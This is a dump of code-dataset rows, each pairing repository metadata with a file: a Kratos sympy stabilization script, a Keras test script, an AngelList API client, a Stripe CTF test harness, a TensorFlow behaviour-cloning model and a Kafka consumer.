new_img = undistort(img, newcameramtx, roi, mtx, dist)
cv2.imshow('calibresult',cv2.resize(new_img,(int(new_img.shape[1]*0.4),int(new_img.shape[0]*0.4)))) | [
"cardinal.quentin@gmail.com"
] | cardinal.quentin@gmail.com |
61cf636fe1e3b402dd46f44f844e6cd651afc53b | a5ca50c35dd71667ec905b883bd3f181ab5d2cab | /applications/FluidDynamicsApplication/symbolic_generation/compressible_navier_stokes/generate_stabilization_matrix.py | 5c49316a2a83b9cd0bc5ce9eab985c8941e03480 | [
"BSD-3-Clause"
] | permissive | philbucher/Kratos | 74aeed105fb283caa2a2e84f44229d4ff657099e | 1ceb900dbacfab344e27e32285250eafc52093ec | refs/heads/master | 2022-03-19T08:38:33.276133 | 2021-11-19T12:14:53 | 2021-11-19T12:14:53 | 216,619,563 | 1 | 0 | NOASSERTION | 2021-11-19T12:14:54 | 2019-10-21T16:54:08 | C++ | UTF-8 | Python | false | false | 2,472 | py | from sympy import *
from KratosMultiphysics import *
from KratosMultiphysics.sympy_fe_utilities import *
def ComputeStabilizationMatrix(params):
"""This function calculates the stabilization matrix"""
print("\nCompute stabilization matrix\n")
dim = params["dim"] # Spatial dimensions
Tau = zeros(dim+2,dim+2) # Stabilization Matrix
tau1 = Symbol('tau1')
tau2 = Symbol('tau2')
tau3 = Symbol('tau3')
Tau[0,0] = tau1
for i in range (0,dim):
Tau[i + 1, i + 1] = tau2
Tau[dim + 1, dim + 1] = tau3
return(Tau)
def ComputeStabilizationMatrixOnGaussPoint(params, U_gauss, f_gauss, r_gauss, mu_sc_gauss = 0.0, lamb_sc_gauss = 0.0):
"""This function calculates the stabilization matrix on a Gauss point"""
print("\t- Compute stabilization matrix on Gauss pt.")
# Calculate auxiliary values
rho_g = U_gauss[0]
e_t_g = U_gauss[params["dim"] + 1]
norm_v_squared = 0.0
norm_f_squared = 0.0
for d in range(params["dim"]):
norm_v_squared += (U_gauss[d + 1] * U_gauss[d + 1]) / (rho_g * rho_g)
norm_f_squared += f_gauss[d] * f_gauss[d]
norm_v = sqrt(norm_v_squared)
nu = (params["mu"] + mu_sc_gauss) / rho_g
alpha = (params["lambda"] + lamb_sc_gauss) / (rho_g * params["gamma"] * params["c_v"])
# Calculate sound speed
c = sqrt(params["gamma"] * (params["gamma"] -1) * ((e_t_g / rho_g) - ((1.0 / 2.0) * norm_v_squared)))
# Calculate stabilization constants
tau1_inv = (params["stab_c2"] * (norm_v + c)) / params["h"]
tau1_inv += params["stab_c3"] * sqrt((r_gauss**2 + 2.0 * c**2 * norm_f_squared + sqrt(r_gauss**4 + 4.0 * c**2 * norm_f_squared *r_gauss**2)) / (2.0 * c**4))
tau2_inv = ((params["stab_c1"] * 4.0 * nu) / (3 * params["h"]**2)) + tau1_inv
tau3_inv = (params["stab_c1"] * alpha / params["h"]**2) + tau1_inv
# Save the obtained values in the stabilization matrix
Tau = zeros(params["dim"] + 2, params["dim"] + 2)
Tau[0,0] = 1.0 / tau1_inv
for i in range (params["dim"]):
Tau[i + 1, i + 1] = 1.0 / tau2_inv
Tau[params["dim"] + 1, params["dim"] + 1] = 1.0 / tau3_inv
return(Tau)
def PrintStabilizationMatrix(Tau, params):
"""Auxiliary function to print the stabilization matrix"""
print("The Stabilization term matrix is:\n")
dim = params["dim"]
for i in range (0,dim+2):
for j in range (0,dim+2):
print("Tau[",i,",",j,"]=",Tau[i,j],"\n")
return 0
| [
"rubenzorrillamartinez@hotmail.com"
] | rubenzorrillamartinez@hotmail.com |
70972eb1ec404daa58b302a2aba95cc9f7fb235c | 2449d8ca3bb5dd377d7de2058398352405c86aaf | /hw3/2a_testCNN.py | ad62662fc36f89bc85c641c64d4d7070c3787768 | [] | no_license | chenchc/ML2016 | f4e6f5c6d8a089771bac5b5f49ef2d11c4b839c7 | c04f213fb42b99c2de67509bf1acb2cb0fde4080 | refs/heads/master | 2021-03-24T09:14:49.342513 | 2016-12-08T09:08:23 | 2016-12-08T09:08:23 | 68,990,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,003 | py | import os
from keras.models import load_model
import a_model
import pickle
import sys
import numpy
import random
import csv
def readTestData(filename):
with open(filename) as file:
testData = pickle.load(file)
testMatrix = []
for i in range(len(testData['data'])):
instance = testData['data'][i]
instanceInXYC = numpy.ndarray((32, 32, 3))
for c in range(3):
for y in range(32):
for x in range(32):
instanceInXYC[y, x, c] = float(instance[c * 32 * 32 + y * 32 + x]) / 255
testMatrix.append(instanceInXYC)
return numpy.array(testMatrix)
# Parse Arguments
testDataPath = sys.argv[1]
modelPath = sys.argv[2]
outputPath = sys.argv[3]
# Read Data
testMatrix = readTestData(testDataPath + "/test.p")
# Test
model = load_model(modelPath)
predict = model.predict_classes(testMatrix, batch_size=8)
with open(outputPath, 'wb') as file:
writer = csv.writer(file, delimiter=',')
writer.writerow(['ID', 'class'])
for i in range(len(predict)):
writer.writerow([i, predict[i]])
| [
"r05922063@ntu.edu.tw"
] | r05922063@ntu.edu.tw |
6a9a2140c3b9497705914e18dd94ed31139bc3b7 | bd6bfc81cd266c8623543473c64bacda131b39a6 | /angellist.py | cea22da59c2b95eadf0ef01a6e7523bbd4cb7e8e | [] | no_license | troyshu/angellistalumnibot | 5b2fba65907dc6e35f444e042e3ba6c6ef4214c8 | dd7aaf0cb884e36473295c344a0d45ab3c28beb2 | refs/heads/master | 2016-09-09T23:17:56.984129 | 2014-02-19T13:47:47 | 2014-02-19T13:47:47 | 16,949,225 | 8 | 6 | null | null | null | null | UTF-8 | Python | false | false | 18,237 | py | #######################################################################################
# Python implementation of AngelList OAuth Authorization and API. #
# #
# Author: Kevin Marshall #
# Email : info@falicon.com #
# Web: http://www.falicon.com #
# #
#######################################################################################
import hashlib
import urllib, urllib2
from werkzeug.urls import *
try:
import simplejson as json
except ImportError:
import json
"""
Provides a Pure Python AngelList API Interface.
"""
class AngelListError(Exception):
"""
generic exception class; may be thrown by various errors in the OAuth flow
"""
def __init__(self, value):
self.parameter = value
def __str__(self):
return repr(self.parameter)
class AngelList(object):
def __init__(self):
"""
AngelList Base class that simply implements AngelList OAuth Authorization and
AngelList APIs such as Activity Feeds, Follows, Reviews, Startups,
Startup Roles, Status Updates, Tags, and Users.
Please create an application from the link below if you do not have an API key
and secret key yet.
- http://angel.co/api/oauth/clients
"""
# Credientials
self.URI_SCHEME = "https"
self.API_ENDPOINT = "%s://api.angel.co" % self.URI_SCHEME
self.OAUTH_ENDPOINT = "%s://angel.co/api" % self.URI_SCHEME
self.ACCESS_TOKEN_URL = "/oauth/token"
self.AUTHORIZATION_URL = "/oauth/authorize"
self.client_id = None
self.client_secret = None
self.access_token = None
#############################
# OAUTH SPECIFIC SECTION
#############################
def getAuthorizeURL(self, client_id = None, ):
self.client_id = client_id and client_id or self.client_id
if self.client_id is None:
raise AngelListError("client_id is NULL. Plase set this or pass it as a parameter first.")
return "%s%s?client_id=%s&response_type=code" % (self.OAUTH_ENDPOINT, self.AUTHORIZATION_URL, self.client_id)
def getAccessToken(self, client_id = None, client_secret = None, code = None):
self.client_id = client_id and client_id or self.client_id
if self.client_id is None:
raise AngelListError("client_id is NULL. Plase set this or pass it as a parameter first.")
self.client_secret = client_secret and client_secret or self.client_secret
if self.client_secret is None:
raise AngelListError("client_secret is NULL. Plase set this or pass it as a parameter first.")
if code is None:
raise AngelListError("code is NULL. Plase pass the REQUEST['code'] angel.co/api/oauth/authorize responeded with as a parameter.")
url = "%s%s?client_id=%s&client_secret=%s&code=%s&grant_type=authorization_code" % (self.OAUTH_ENDPOINT, self.ACCESS_TOKEN_URL, self.client_id, self.client_secret, code)
try:
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
params = urllib.urlencode({})
response = urllib2.urlopen(urllib2.Request(url, params, headers))
json_data = json.loads(response.read())
access_token = json_data['access_token']
except:
# access token failed to fetch (for any reason); so we'll just return blank
access_token = ''
self.access_token = access_token
return access_token
#############################
# GENERAL HELPER FUNCTIONS
#############################
def do_get_request(self, url):
"""
perform a GET request to the supplied url
"""
response = urllib2.urlopen(url)
return json.loads(response.read())
def do_post_request(self, url, data = None):
"""
perform a POST request to the supplied url with the given fieldvalues
"""
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
params = urllib.urlencode(data)
response = urllib2.urlopen(urllib2.Request(url, params, headers))
return json.loads(response.read())
def do_delete_request(self, url, data = None):
"""
perform a DELETE request to the supplied url
"""
opener = urllib2.build_opener(urllib2.HTTPHandler)
params = urllib.urlencode(data)
request = urllib2.Request(url, params)
request.add_header('Content-Type', 'text/plain')
request.get_method = lambda: 'DELETE'
response = opener.open(request)
return json.loads(response.read())
def check_access_token(self, access_token = None):
self.access_token = access_token and access_token or self.access_token
if self.access_token is None:
raise AngelListError("access_token is Null. Please set it first")
return
#############################
# ANGEL.CO API FUNCTIONS
#############################
##########################################################
# Activity Feeds (http://angel.co/api/spec/activity_feeds)
# (GET) https://api.angel.co/1/feed
def getFeed(self, access_token = None):
self.check_access_token(access_token)
return self.do_get_request('%s/1/feed?access_token=%s' % (self.API_ENDPOINT, self.access_token))
##########################################################
# Follows (http://angel.co/api/spec/follows)
### NOT WORKING YET [[DELETE ISSUE]]
# (DELETE) https://api.angel.co/1/follows [type, id]
def deleteFollows(self, access_token = None, follow_type = None, follow_id = None):
"""
follow_type - REQUIRED - 'user' or 'startup'
id - REQUIRED - the id of the user or startup to stop following
"""
self.check_access_token(access_token)
if follow_type is None:
raise AngelListError("the follow_type param is required for this api call.")
if follow_id is None:
raise AngelListError("the follow_id param is required for this api call.")
data = {'type':follow_type, 'id':follow_id}
url = "%s/1/follows?access_token=%s" % (self.API_ENDPOINT, self.access_token)
return self.do_delete_request(url, data)
# (POST) https://api.angel.co/1/follows [type, id]
def addFollows(self, access_token = None, follow_type = None, follow_id = None):
"""
follow_type - REQUIRED - 'user' or 'startup'
id - REQUIRED - the id of the user or startup to stop following
"""
self.check_access_token(access_token)
if follow_type is None:
raise AngelListError("the follow_type param is required for this api call.")
if follow_id is None:
raise AngelListError("the follow_id param is required for this api call.")
data = {'type':follow_type, 'id':follow_id}
url = "%s/1/follows?access_token=%s" % (self.API_ENDPOINT, self.access_token)
return self.do_post_request(url, data)
# (GET) https://api.angel.co/1/users/:id/followers
def getFollowers(self, access_token = None, user_id = None):
self.check_access_token(access_token)
if user_id is None:
raise AngelListError("the user_id param is required for this api call.")
return self.do_get_request('%s/1/users/%s/followers?access_token=%s' % (self.API_ENDPOINT, user_id, self.access_token))
# (GET) https://api.angel.co/1/users/:id/followers/ids
def getFollowersIds(self, access_token = None, user_id = None):
self.check_access_token(access_token)
if user_id is None:
raise AngelListError("the user_id param is required for this api call.")
return self.do_get_request('%s/1/users/%s/followers/ids?access_token=%s' % (self.API_ENDPOINT, user_id, self.access_token))
# (GET) https://api.angel.co/1/users/:id/following
def getFollowing(self, access_token = None, user_id = None):
self.check_access_token(access_token)
if user_id is None:
raise AngelListError("the user_id param is required for this api call.")
return self.do_get_request('%s/1/users/%s/following?access_token=%s' % (self.API_ENDPOINT, user_id, self.access_token))
# (GET) https://api.angel.co/1/users/:id/following/ids
def getFollowingIds(self, access_token = None, user_id = None):
self.check_access_token(access_token)
if user_id is None:
raise AngelListError("the user_id param is required for this api call.")
return self.do_get_request('%s/1/users/%s/following/ids?access_token=%s' % (self.API_ENDPOINT, user_id, self.access_token))
# (GET) https://api.angel.co/1/startups/:id/followers
def getStartupsFollowers(self, access_token = None, startup_id = None):
self.check_access_token(access_token)
if startup_id is None:
raise AngelListError("the startup_id param is required for this api call.")
return self.do_get_request('%s/1/startups/%s/followers?access_token=%s' % (self.API_ENDPOINT, startup_id, self.access_token))
# (GET) https://api.angel.co/1/startups/:id/followers/ids
def getStartupsFollowersIds(self, access_token = None, startup_id = None):
self.check_access_token(access_token)
if startup_id is None:
raise AngelListError("the startup_id param is required for this api call.")
return self.do_get_request('%s/1/startups/%s/followers/ids?access_token=%s' % (self.API_ENDPOINT, startup_id, self.access_token))
##########################################################
# Reviews (http://angel.co/api/spec/reviews)
# (GET) https://api.angel.co/1/reviews
def getReviews(self, access_token = None, user_id = None):
"""
user_id - OPTIONAL - id of the user you want reviews on (defaults to auth'ed user)
"""
self.check_access_token(access_token)
return self.do_get_request('%s/1/reviews?access_token=%s&user_id=%s' % (self.API_ENDPOINT, self.access_token, user_id))
##########################################################
# Startups (http://angel.co/api/spec/startups)
# (GET) https://api.angel.co/1/startups/:id
def getStartups(self, access_token = None, startup_id = None):
self.check_access_token(access_token)
if startup_id is None:
raise AngelListError("the startup_id param is required for this api call.")
return self.do_get_request('%s/1/startups/%s?access_token=%s' % (self.API_ENDPOINT, startup_id, self.access_token))
# (GET) https://api.angel.co/1/startups/search
def getStartupsSearch(self, access_token = None, slug = None, domain = None):
"""
slug - OPTIONAL - the slug for the startup you are searching for
domain - OPTIONAL - the domain of the startup you are searching for
"""
self.check_access_token(access_token)
url = '%s/1/startups/search?access_token=%s' % (self.API_ENDPOINT, self.access_token)
if slug:
url = '%s&slug=%s' % (url, slug)
if domain:
url = '%s&domain=%s' % (url, domain)
return self.do_get_request(url)
# (GET) https://api.angel.co/1/tags/:id/startups
def getTagsStartups(self, access_token = None, tag_id = None):
self.check_access_token(access_token)
if tag_id is None:
raise AngelListError("the tag_id param is required for this api call.")
return self.do_get_request('%s/1/tags/%s/startups?access_token=%s' % (self.API_ENDPOINT, tag_id, self.access_token))
##########################################################
# Startup Roles (http://angel.co/api/spec/startup_roles)
# (GET) https://api.angel.co/1/startup_roles
def getStartupRoles(self, access_token = None, user_id = None, startup_id = None):
"""
user_id - OPTIONAL - the user who's startup relationships you want to view
startup_id - OPTIONAL - the startup who's user relationships you want to view
"""
self.check_access_token(access_token)
url = '%s/1/startups_roles?access_token=%s' % (self.API_ENDPOINT, self.access_token)
if user_id:
url = '%s&user_id=%s' % (url, user_id)
if startup_id:
url = '%s&startup_id=%s' % (url, startup_id)
return self.do_get_request(url)
##########################################################
# Status Updates (http://angel.co/api/spec/status_update)
# (GET) https://api.angel.co/1/status_updates
def getStatusUpdates(self, access_token = None, user_id = None, startup_id = None):
"""
user_id - OPTIONAL
startup_id - OPTIONAL
"""
self.check_access_token(access_token)
url = '%s/1/startups_updates?access_token=%s' % (self.API_ENDPOINT, self.access_token)
if user_id:
url = '%s&user_id=%s' % (url, user_id)
if startup_id:
url = '%s&startup_id=%s' % (url, startup_id)
return self.do_get_request(url)
# (POST) https://api.angel.co/1/status_updates
def postStatusUpdates(self, access_token = None, startup_id = None, message = None):
"""
startup_id - OPTIONAL - id of the startup you want to updated.
message - REQUIRED - the status message to post
"""
self.check_access_token(access_token)
if message is None:
raise AngelListError("the message param is required for this api call.")
data = {'message':message}
if startup_id:
data['startup_id'] = startup_id
url = "%s/1/status_updates?access_token=%s" % (self.API_ENDPOINT, self.access_token)
return self.do_post_request(url, data)
# (DELETE) https://api.angel.co/1/status_updates/:id
def deleteStatusUpdates(self, access_token = None, status_id = None):
self.check_access_token(access_token)
if status_id is None:
raise AngelListError("the status_id param is required for this api call.")
data = {'id':status_id}
url = "%s/1/status_updates?access_token=%s" % (self.API_ENDPOINT, self.access_token)
return self.do_delete_request(url, data)
##########################################################
# Tags (http://angel.co/api/spec/tags)
# (GET) https://api.angel.co/1/tags/:id
def getTags(self, access_token = None, tag_id = None):
self.check_access_token(access_token)
if tag_id is None:
raise AngelListError("the tag_id param is required for this api call.")
return self.do_get_request('%s/1/tags/%s?access_token=%s' % (self.API_ENDPOINT, tag_id, self.access_token))
# (GET) https://api.angel.co/1/tags/:id/children
def getTagsChildren(self, access_token = None, tag_id = None):
self.check_access_token(access_token)
if tag_id is None:
raise AngelListError("the tag_id param is required for this api call.")
return self.do_get_request('%s/1/tags/%s/children?access_token=%s' % (self.API_ENDPOINT, tag_id, self.access_token))
# (GET) https://api.angel.co/1/tags/:id/parents
def getTagsParents(self, access_token = None, tag_id = None):
self.check_access_token(access_token)
if tag_id is None:
raise AngelListError("the tag_id param is required for this api call.")
return self.do_get_request('%s/1/tags/%s/parents?access_token=%s' % (self.API_ENDPOINT, tag_id, self.access_token))
# (GET) https://api.angel.co/1/tags/:id/startups
def getTagsStartups(self, access_token = None, tag_id = None, order = None, per_page = None, page = None):
self.check_access_token(access_token)
url = '%s/1/tags/%s/startups?access_token=%s' % (self.API_ENDPOINT, tag_id, self.access_token)
if tag_id is None:
raise AngelListError("the tag_id param is required for this api call.")
if order:
url = '%s&order=%s' % (url, order)
if per_page:
url = '%s&per_page=%s' % (url, per_page)
if page:
url = '%s&page=%s' % (url, page)
return self.do_get_request(url)
##########################################################
# Users (http://angel.co/api/spec/users)
# (GET) https://api.angel.co/1/users/:id
def getUsers(self, access_token = None, user_id = None):
self.check_access_token(access_token)
if user_id is None:
raise AngelListError("the user_id param is required for this api call.")
return self.do_get_request('%s/1/users/%s?access_token=%s' % (self.API_ENDPOINT, user_id, self.access_token))
# (GET) https://api.angel.co/1/users/search
def getUsersSearch(self, access_token = None, slug = None, email = None):
self.check_access_token(access_token)
url = '%s/1/users/search?access_token=%s' % (self.API_ENDPOINT, self.access_token)
if slug:
url = '%s&slug=%s' % (url, slug)
if email:
md5_hash = hashlib.md5(email).hexdigest()
url = '%s&md5=%s' % (url, md5_hash)
try:
results = self.do_get_request(url)
except:
# couldn't find any results so just return an empty object
results = json.loads('{}')
return results
# (GET) https://api.angel.co/1/me
def getMe(self, access_token = None):
self.check_access_token(access_token)
return self.do_get_request('%s/1/me?access_token=%s' % (self.API_ENDPOINT, self.access_token))
##########################################################
# Search (https://angel.co/api/spec/search)
# (GET) https://api.angel.co/1/search?query=:1&type=:2
def getSearch(self, access_token = None, query='', atype='User'):
self.check_access_token(access_token)
url = '%s/1/search?access_token=%s' % (self.API_ENDPOINT, self.access_token)
url = '%s&query=%s' % (url, query)
url = '%s&type=%s' % (url, atype)
url = url_fix(url)
try:
results = self.do_get_request(url)
except:
# couldn't find any results so just return an empty object
results = json.loads('{}')
return results, url
| [
"tmshu1@gmail.com"
] | tmshu1@gmail.com |
d0ddccb63a8286112433e6886535c15b78ec17a4 | 01c6f08f04a5aba3432a672744ad38b07b66cb24 | /tests/test_logic.py | 3c9bc6c23100bb411cca0ac4505621c9a1a70bf9 | [] | no_license | patnir/photo-translator | bced9fa5bf355a47ab1e468fde7cc571ef434389 | f4ce12f75f0f7e9cbb99192066ec026a91bc83e1 | refs/heads/main | 2023-03-17T23:42:50.964279 | 2021-03-17T06:27:20 | 2021-03-17T06:27:20 | 348,130,870 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | from src.logic import translate_photo_contents_into_text
def test_translate():
assert translate_photo_contents_into_text("photo") == "text" | [
"test@tests-mbp.home"
] | test@tests-mbp.home |
5b5cabf08a29039bc59cd1bac436dc857eb9d0b4 | 7833b9033fd68713920b431b56d952ce1b26bf64 | /level0/test/lib/test_framework.py | a95c230d95a4896aa6339af1264722ccb345ae1d | [] | no_license | thbishop/stripe_ctf_3 | 15e7a302223d74e632a5a985024a91480bb04e48 | a05b6d9262a040164ff60b07a55489fdcfa00ba3 | refs/heads/master | 2020-04-01T08:32:29.006343 | 2014-01-31T18:18:42 | 2014-01-31T18:18:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,387 | py | import difflib
import os.path
from random import SystemRandom
import re
import subprocess
import sys
import time
# From this package
import lib.error as error
import lib.http_client as http_client
import lib.util as util
data_directory = os.path.join(os.path.dirname(__file__), "..", "data")
class TestCase(object):
def __init__(self, harness, id_or_url):
self.harness = harness
self.id, self.url = self.normalize_id_and_url(id_or_url)
self.json = None
def normalize_id_and_url(self, id_or_url):
if re.match("\Ahttps?:", id_or_url):
url = id_or_url
# Look at the last component and remove extension
id = id_or_url.split('/')[-1].split('.')[0]
else:
id = id_or_url
level = self.harness.LEVEL
url = "https://stripe-ctf-3.s3.amazonaws.com/level%s/%s.json" % (level, id)
return id, url
def dump_path(self):
return os.path.join(self.harness.test_cases_path(), self.id + ".json")
def load(self):
if self.json: return self.json
try:
f = open(self.dump_path(), "r")
self.json = util.json.load(f)
f.close()
return self.json
except IOError:
pass
util.logger.info('Fetching. URL: %s', self.url)
content = self.harness.fetch_s3_resource(self.url)
try:
self.json = util.json.loads(content)
except ValueError:
# Decoding the JSON failed.
msg = ("There was a problem parsing the test case. We expected "
"JSON. We received: %s" % (content,))
raise error.StripeError(msg)
return self.json
def flush(self):
f = open(os.path.join(self.harness.test_cases_path(), self.id + ".json"), "w")
util.json.dump(self.json, f)
f.close()
class AbstractHarness(object):
def __init__(self, ids_or_urls=[], options={}):
util.mkdir_p(self.test_cases_path())
if not os.path.isfile(http_client.certs_path()):
msg = ("You seem to have deleted the file of certificates "
"that shipped with this repo. It should exist "
"at %s" % http_client.certs_path())
raise error.StripeError(msg)
if ids_or_urls == []:
util.logger.info('No test case supplied. Randomly choosing among defaults.')
ids_or_urls = [SystemRandom().choice(self.DEFAULT_TEST_CASES)]
self.test_cases = map(lambda token: TestCase(self, token), ids_or_urls)
self.options = options
headers = {
'User-Agent': 'Stripe TestHarness/%s' % (self.VERSION,),
}
self.http_client = http_client.new_default_http_client(headers=headers, verify_ssl_certs=True)
def fetch_s3_resource(self, url):
try:
content, status_code = self.http_client.request("get", url)
except error.HTTPConnectionError:
err = util.exception_as()
msg = ("There was an error while connecting to fetch "
"the url %s. Please check your connectivity. If there "
"continues to be an issue, please let us know at "
"ctf@stripe.com. The specific error is:\n" % (url,))
raise error.StripeError(msg + str(err))
if status_code == 200:
return content
elif status_code == 403:
msg = ("We received a 403 while fetching the url %s. "
"This probably means that you are trying to get "
"something that doesn't actually exist." % (url,))
raise error.StripeError(msg)
else:
msg = ("We received the unexpected response code %i while "
"fetching the url %s." % (status_code, url,))
raise error.StripeError(msg)
def run(self):
task = self.options["task"]
if task == "execute":
test_cases_to_execute = self.load_test_cases()
self.execute(test_cases_to_execute)
else:
raise StandardError("Unrecognized task " + task)
def test_cases_path(self):
return os.path.join(
data_directory,
"downloaded_test_cases",
"version%i" % self.VERSION)
def flush_test_cases(self):
util.logger.info('Flushing. Path: %s', self.test_cases_path())
for test_case in self.test_cases:
test_case.flush(self.test_cases_path())
def add_test_case(self, test_case):
self.test_cases.append(test_case)
def load_test_cases(self):
loaded_test_cases = []
for test_case in self.test_cases:
result = test_case.load()
if not result: continue
test_case.flush()
loaded_test_cases.append(test_case)
return loaded_test_cases
def hook_preexecute(self):
# May override
pass
def execute(self, test_cases_to_execute):
self.hook_preexecute()
runner = self.hook_create_runner()
for test_case in test_cases_to_execute:
if self.options["raw"]:
util.logger.info(runner.run_test_case_raw(test_case.json))
else:
runner.run_test_case(test_case.json)
class AbstractRunner(object):
def __init__(self, options):
pass
# may override
def code_directory(self):
return os.path.join(os.path.dirname(__file__), "..")
def log_diff(self, benchmark_output, user_output):
util.logger.info("Here is the head of your output:")
util.logger.info(user_output[0:2000])
diff = list(difflib.Differ().compare(benchmark_output.splitlines(True),
user_output.splitlines(True)))
lines = filter(lambda line: line[0] != "?", diff[0:100])
util.logger.info("\n***********\n")
util.logger.info("Here is the head of the diff between your output and the benchmark:")
util.logger.info("".join(lines))
def run_build_sh(self):
util.logger.info("Building your code via `build.sh`.")
build_runner = subprocess.Popen([
os.path.join(self.code_directory(), "build.sh")],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Blocks
stdout, stderr = build_runner.communicate()
if build_runner.returncode == 0:
util.logger.info("Done building your code.")
else:
util.logger.info("Build failed with code %i. Stderr:", build_runner.returncode)
util.logger.info(stderr)
# may override
def hook_prerun(self):
pass
def run_test_case(self, test_case):
self.hook_prerun()
id = test_case['id']
util.logger.info("About to run test case: %s" % id)
input = test_case['input']
result = self.run_input(input)
return self.report_result(test_case, result)
def run_test_case_raw(self, test_case):
self.hook_prerun()
input = test_case['input']
result = self.run_input(input)
return result['output']
def run_input(self, input):
util.logger.info("Beginning run.")
output = self.run_subprocess_command(self.subprocess_command(), input)
util.logger.info('Finished run')
return output
def report_stderr(self, stderr):
if not stderr: return
util.logger.info("Standard error from trial run:")
util.logger.info(stderr)
def subprocess_communicate(self, runner, input):
if sys.version_info >= (3, 0):
input = input.encode('utf-8')
stdout, stderr = runner.communicate(input)
if sys.version_info >= (3, 0):
stderr = stderr.decode('utf-8')
stdout = stdout.decode('utf-8')
return stdout, stderr
def run_subprocess_command(self, command, input):
start_time = time.time()
runner = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = self.subprocess_communicate(runner, input)
end_time = time.time()
return {
'wall_clock_time': end_time - start_time,
'output': stdout,
'input': input,
'level': self.LEVEL,
'exitstatus': runner.returncode,
}
| [
"bishop.thomas@gmail.com"
] | bishop.thomas@gmail.com |
ee3bd0fd9cd417e9f857dba2376e138ca1a6af7b | f9e2a4f93e7c18390052b87a45f199abce817ffe | /lib/python3.6/reprlib.py | eb5fd636821e416479b02e063c128c24a74e831a | [] | no_license | tunaho/Seng2021 | e356e820458b65a3382671dc9c5810acf9db4b83 | 8be83cf2ada6a069d5b67f9f731bf30b85e8afef | refs/heads/master | 2021-09-15T06:48:48.956845 | 2018-05-28T02:52:05 | 2018-05-28T02:52:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 99 | py | C:/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/reprlib.py | [
"z5160298@ad.unsw.edu.au"
] | z5160298@ad.unsw.edu.au |
55dd3bb40f27748ad37544434f81d3b3f8af7dbc | ee9d0897c1dfc9a7570dd482056ff174d2bf3cf1 | /twitter/rest-api/lib/python2.7/linecache.py | 742c382c3f110230e34c834dc845d977e9603178 | [] | no_license | ravneetg/mids-w205-2 | 15fbd7d7356fa9ff8cf808a6a2cc9ed75114ee4c | 796d07ad7ff53ff3350fa8b184b9c3d2be0ff795 | refs/heads/master | 2020-07-04T11:44:41.459445 | 2016-12-18T08:34:44 | 2016-12-18T08:34:44 | 67,957,203 | 0 | 1 | null | 2016-12-18T08:34:44 | 2016-09-11T22:15:03 | null | UTF-8 | Python | false | false | 47 | py | /home/blue/anaconda2/lib/python2.7/linecache.py | [
"ravneetghuman@ischool.berkeley.edu"
] | ravneetghuman@ischool.berkeley.edu |
4d38f7bb468beb4ae0d12208543491dffacf5088 | fc93328977a795b72b3d2b4b9ba3d5656e3a3145 | /bc/model.py | fc0f1217c125aed27218e37296fda571977b9f4e | [] | no_license | Recharrs/bc | cbd06b841005fae713b874b845c27f4e39a25414 | c4cebf5ba1475954453a98ca36f376ba4139e168 | refs/heads/master | 2020-03-28T23:48:02.900041 | 2018-10-24T09:40:15 | 2018-10-24T09:40:15 | 149,309,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,626 | py | import numpy as np
import tensorflow as tf
class Model:
def __init__(self, state_dim, action_dim, restore_path=None):
self.sess = tf.get_default_session()
self.state_dim = state_dim
self.action_dim = action_dim
''' Build Model '''
with tf.variable_scope("model") as scope:
self.s = tf.placeholder(tf.float32, [None, self.state_dim])
self.a = tf.placeholder(tf.float32, [None, self.action_dim])
h1 = tf.layers.dense(self.s, 64, activation=tf.nn.relu)
h2 = tf.layers.dense(h1, 64, activation=tf.nn.relu)
mu = tf.layers.dense(h2, self.action_dim)
sigma = tf.layers.dense(h2, self.action_dim)
pd = tf.contrib.distributions.MultivariateNormalDiag(loc=mu, scale_diag=sigma)
self.a_pred = pd.sample()
''' Loss & Opt '''
self.loss = tf.losses.mean_squared_error(labels=self.a, predictions=self.a_pred)
tf.summary.scalar("loss", self.loss)
self.train_op = tf.train.AdamOptimizer(learning_rate=3e-4).minimize(self.loss)
''' Summary '''
self.summary = tf.summary.merge_all()
def train(self, batch_s, batch_a):
''' action should be normalized to [-1, 1]'''
loss, summary, _ = self.sess.run(
[self.loss, self.summary, self.train_op], feed_dict={
self.s: batch_s,
self.a: batch_a,
})
return loss, summary
def predict(self, s):
action = self.sess.run([self.a_pred], feed_dict={
self.s: s
})
return action
| [
"sliz97028@gmail.com"
] | sliz97028@gmail.com |
24ce46c3f2cdf6328f9ad6f2523d90a5c1357fab | a9adcb5efb4492094ecd9e45741b409afca56f53 | /democratizing_weather_data/streaming/sample_code/sample_consumer.py | 11bae809c233d80495b34da49e9d8ab418dbe20b | [] | no_license | LeoSalemann/democratizing_weather_data | 0792a4419a67799f8f5b60585a6ec32aab72c4c6 | 55d84e8bc3748b0df166d5f2c999bd7906cff1f5 | refs/heads/master | 2021-05-05T10:03:39.234295 | 2017-09-19T01:58:41 | 2017-09-19T01:58:41 | 104,013,673 | 0 | 0 | null | 2017-09-19T02:05:05 | 2017-09-19T02:05:05 | null | UTF-8 | Python | false | false | 822 | py | import sys
import logging
import multiprocessing
from kafka import KafkaConsumer
class Consumer(multiprocessing.Process):
def __init__(self, topic_name):
self.topic_name = topic_name
daemon = True
def run(self):
consumer = KafkaConsumer(bootstrap_servers='localhost:9092',
auto_offset_reset='earliest')
consumer.subscribe(self.topic_name)
for message in consumer:
print (message)
def main():
topic_name = sys.argv[1:]
consumer = Consumer(topic_name)
consumer.run()
time.sleep(10)
if __name__ == "__main__":
logging.basicConfig(
format='%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s',
level=logging.INFO
)
main()
| [
"leo.salemann@me.com"
] | leo.salemann@me.com |
